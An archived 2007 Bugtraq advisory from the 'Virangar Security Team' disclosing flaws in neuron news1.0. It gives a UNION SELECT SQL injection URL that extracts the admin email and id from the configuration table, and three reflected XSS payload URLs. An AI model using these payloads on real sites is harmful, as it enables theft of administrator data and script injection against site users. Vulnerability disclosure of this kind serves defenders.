neuron news1.0 Multiple Remote Vulnerabilities (sql injection/xss)

---

• From: hadihadi_zedehal_2006@xxxxxxxxx
• Date: 16 Dec 2007 23:13:42 -0000

---

####################################################################
# #
# ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::.... #
# (sql injection/xss) #
####################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
------------------------------------

vlues:

1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</script>&newsmonth=<script>alert(111111)</script>
########################
g00d l0uck

---

• Prev by Date: ClubHack2007: Presentation are online now
• Next by Date: Re: PHP MySQL Banner Exchange 2.2.1 remote mysql database bug
• Previous by thread: ClubHack2007: Presentation are online now
• Next by thread: ZSA-2007-029: syslog-ng Denial of Service
• Index(es):
  • Date
  • Thread

---

Relevant Pages php-addressbook v2.0 SQL Injection Vulnerbility ... Virangar Security Team ... special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra ... & all virangar members & all iranian hackerz ... & my lovely friend arashfrom emperor team:) ... (Bugtraq) blur6ex-0.3.462 LOCAL FILE INCLUSION Vulnerbility ... Discoverd By:Virangar Security Team (hadihadi) ... special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra ... & all virangar members & all iranian hackerz ... & my lovely friend arashfrom emperor team:) ... (Bugtraq) CuteFlow Version 1.5.0 Multiple Remote Vulnerabilities ... Virangar Security Team ... special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra ... & my lovely friend arashfrom emperor team:) ... sql vuln code in login.php: ... (Bugtraq) dbdisplay.pl(all versions) Remote execut Vulnerability ... Virangar Security Team ... & all virangar members & all iranian hackerz ... greetz:to my best friend in the world hadi_aryaie2004 ... (Bugtraq) Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ... Virangar Security Team ... VIRANGAR UNDER GR0UND TEAM ... Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS ... (Bugtraq)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2007-12